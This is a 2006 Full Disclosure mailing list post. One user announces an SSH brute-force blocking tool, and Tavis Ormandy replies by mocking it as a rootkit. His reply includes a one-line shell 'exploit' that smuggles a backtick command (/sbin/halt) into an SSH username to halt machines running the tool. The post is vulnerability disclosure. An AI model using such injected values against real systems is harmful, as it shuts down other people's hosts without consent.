Full Disclosure mailing list archives
Re: SSH brute force blocking tool
From: Tavis Ormandy <taviso () gentoo org>
Date: Mon, 27 Nov 2006 20:34:33 +0000
On Mon, Nov 27, 2006 at 02:22:10PM -0500, J. Oquendo wrote:
For those interested, I wrote a program called Sharpener which is an SSH brute force blocking tool that also reports back the offenders' addresses. I have begun posting the information on the attackers as well as sending out messages (whenever possible) to the admins of these domains. Think of it as an RBL for SSH attackers. The goal is to identify these machines in order for others to implement safeguards (ACL's) against these hosts. Feel free to comment/complain. http://www.infiltrated.net/sharpener (tool) http://www.infiltrated.net/bruteforcers (offenders)
Nice work, really subtle rootkit. I like the email phone-home. Here's an exploit. #!/bin/sh ssh 'foo bar `/sbin/halt`'@victim -- ------------------------------------- taviso () sdf lonestar org | finger me for my pgp key. ------------------------------------------------------- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
- Re: SSH brute force blocking tool gabriel rosenkoetter (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
- Re: SSH brute force blocking tool gabriel rosenkoetter (Nov 27)